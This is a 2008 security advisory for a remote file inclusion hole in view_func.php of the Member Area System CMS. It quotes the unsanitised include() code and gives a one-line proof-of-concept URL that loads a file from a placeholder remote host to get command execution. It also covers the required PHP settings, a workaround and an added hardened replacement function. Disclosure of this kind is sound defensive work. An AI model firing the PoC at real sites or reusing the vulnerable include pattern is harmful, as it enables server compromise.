mas-rfi.txt

Reported 11 Jan 2008 by ShipNX
Source: packetstorm (packetstormsecurity.com)

Member Area System (MAS) Remote File Include Vulnerability in view_func.php allows remote file inclusion and arbitrary command execution. Vendor: Mansion Productions

----------------------------------------------------------------------  
  
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)  
  
----------------------------------------------------------------------  
  
Author: ShipNX <ship_nx [AT] yahoo com>  
Impact: Remote file include  
Status: Patch not available  
  
----------------------------------------------------------------------  
  
Software description:  
  
Name: Member Area System (MAS)  
Version: The vendor has not disclosed version information since v1.7;  
later versions are probably also vulnerable.  
Vendor: Mansion Productions  
Vendor homepage: http://www.mansionproductions.com/  
Software homepage: http://www.mansionproductions.com/mas/  
  
Description:  
MAS is a leading content management system (CMS) designed for  
managing adult-oriented sites. It is used on many major adult sites  
around the world.  
  
----------------------------------------------------------------------  
  
Vulnerability:  
  
Code: view_func.php  

```php
// view_func.php (excerpt)
...
$path=dirname($i).'/';                 // $i arrives unchecked from the request under register_globals
include($path.$l.'/'.'filelist.mas');  // $l is concatenated unchecked into the include path
...
```
  
The variables $i and $l are not sanitized before being used in the  
include() call. If register_globals = On and allow_url_include  
(allow_url_fopen before PHP 5.2.0) = On, an attacker can send a crafted  
request leading to remote file inclusion and therefore arbitrary  
command execution.  
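A hardened replacement for that include, added here as an example and not the vendor's code: the parameter names $i, $l and the file name filelist.mas come from the advisory, while the base directory (__DIR__ . '/members') and the allow-list pattern are assumptions. It reads the parameters explicitly, allow-lists their characters, and confirms the resolved path stays under the base directory, so neither a URL nor a traversal sequence can reach include().

```php
<?php
declare(strict_types=1);

/*
 * Added example, not vendor code: hardened replacement for the include in
 * view_func.php. $i, $l and filelist.mas come from the advisory; the base
 * directory and the allow-list are assumptions for illustration.
 */
function safe_filelist_path(string $base, string $i, string $l): ?string
{
    // Allow-list: plain relative names only. This rejects "http://...",
    // "..", absolute paths and NUL bytes before any path is built.
    // \z rather than $ so a trailing newline cannot slip past the check.
    if (!preg_match('/^[A-Za-z0-9_\-]+(\/[A-Za-z0-9_\-]+)*(\.[A-Za-z0-9]+)?\z/', $i)
        || !preg_match('/^[A-Za-z0-9_\-]{1,64}\z/', $l)) {
        return null;
    }

    $root = realpath($base);
    if ($root === false) {
        return null;
    }

    // Same derivation as the original ($path = dirname($i) . '/'), but
    // rooted under $base instead of wherever the request points.
    $candidate = realpath($root . '/' . dirname($i) . '/' . $l . '/filelist.mas');

    // realpath() resolves symlinks and returns false for missing files; the
    // prefix check confirms the resolved file is still inside $root.
    if ($candidate === false
        || strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Read the parameters explicitly; never depend on register_globals.
$i = $_GET['i'] ?? '';
$l = $_GET['l'] ?? '';

$target = (is_string($i) && is_string($l))
    ? safe_filelist_path(__DIR__ . '/members', $i, $l)   // assumed base directory
    : null;
if ($target === null) {
    http_response_code(400);
    exit('invalid request');
}
include $target;
```

Keeping register_globals = Off and allow_url_include = Off in php.ini remains worthwhile as defence in depth, but the code above no longer relies on either setting.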
  
---------------------------------------------------------------------  
  
POC:  
  
Conditions:  
Register Globals = On  
Allow URL fopen (Allow URL include since PHP 5.2.0) = On  
  
http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?  
  
Note:   
  
justsomedir/ is required here because the data passed via $i is first sent to the dirname()  
function, which will produce  
  
$path='http://remotesite.com/';  
  
The remote file should be placed at http://remotesite.com/testfile.txt  
  
----------------------------------------------------------------------  
  
Workaround:  
  
The vendor has been aware of the vuln for ages (probably since 2006), so they  
recommend setting Register Globals = Off. Not sure why they haven't  
patched the vuln already. If Register Globals is Off on your server, then  
you are more or less secure. If it is On, ask your system administrator  
to turn it Off. If for some reason you need Register Globals = On on your  
site (using old software etc.), then contact the vendor and MAYBE they will  
finally patch the bug :-)  
  
----------------------------------------------------------------------  
  
History:  
  
Vuln found: Late 2005 :-))  
Vendor notified: It seems the vendor has known of the vuln since 2006, but  
for some reason fails to patch it. Maybe they just want to keep it  
quiet, or maybe security matters just don't bother them - not sure.  
Anyway, maybe this advisory will finally force them to do the patching :-))  
Advisory: 11/01/2008  
  
----------------------------------------------------------------------  
  
Thanks to:  
  
DeZender creators :-)  
